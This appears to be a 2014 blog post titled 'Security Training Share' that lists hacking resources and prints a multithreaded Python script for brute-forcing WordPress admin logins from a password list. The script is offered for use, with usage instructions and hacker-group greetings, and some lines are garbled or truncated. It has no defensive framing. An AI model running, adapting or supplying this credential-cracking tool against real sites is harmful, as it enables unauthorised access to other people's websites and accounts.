Thứ Hai, 31 tháng 3, 2014

Security Training Share

1. How to Hack a Website with kali linux

2. Kali Linux - Fake Access Point

4. Metasploit Penetration Testing Cookbook 2nd Edition

5. WordPress Brute Force MultiThreading Python


  1. #!/usr/bin/python
  2. # Video:
  3. # Coded By: xSecurity
  4. import urllib, urllib2, os, sys, requests as xsec, re
  5. from time import sleep
  6. from threading import Thread
  7. def cls():
  8.     linux = 'clear'
  9.     windows = 'cls'
  10.     os.system([linux,windows][ == 'nt'])
  11. cls()
  12. print '''
  13.       __                      _ _        
  14. __  __/ ____  ___ _   _ _ __(_) |_ _   _
  15. \/ // _ \/ __| | | | '__| | __| | | |
  16. >  < ___/ (__| |_| | |  | | |_| |_| |
  17. /_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
  18.                                     |___/WordPress Brute Muliththreading :)
  19. #Home: Sec4ever.CoM | Is-Sec.CoM |
  20. #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
  21. Special For My Lov3r Cyber-Crystal
  22. #Usage: Python admin pass.txt
  23. #Note: U Need Install Requests Package:'''
  24. xsec = xsec.session()
  25. def brute(target,usr,pwd):
  26.     get = xsec.get(target+'/wp-admin/')
  27.     post = {}
  28.     post["log"] = usr
  29.     post["pwd"] = pwd
  30.     post["wp-submit"] = "Log+in"
  31.     post["redirect_to"] = target
  32.     post["testcookie"] = "1"
  33.     get2 ='/wp-login.php' , data=urllib.urlencode(post))
  34.     get3 = xsec.get(target+'/wp-admin')
  35.     if '<li id="wp-admin-bar-logout">' in get3.text:
  36.         print '[+] Cracked Username: '+usr+' & Password: '+pwd
  37.         os._exit(1)
  38.     else:
  39.         print '[~] Trying ...: '+pwd
  40. if len(sys.argv) >= 3:
  41.     target = sys.argv[1]
  42.     usr = sys.argv[2]
  43.     lst = open(sys.argv[3]).read().split("\n")
  44.     print '[*]Target: '+target
  45.     print '[*]LIST:',len(lst)
  46.     print '[*]Username: '+usr
  47.     thrdlst = []
  48.     for pwd in lst:
  49.         t = Thread(target=brute, args=(target,usr,pwd))
  50.         t.start()
  51.         thrdlst.append(t)
  52.         sleep(0.009)
  53.     for b in thrdlst:
  54.         b.join()
  55. else:
  56.     print '[>]There Somthing Missing Check ARGVS :)'

6. Crack, hash,.. tool

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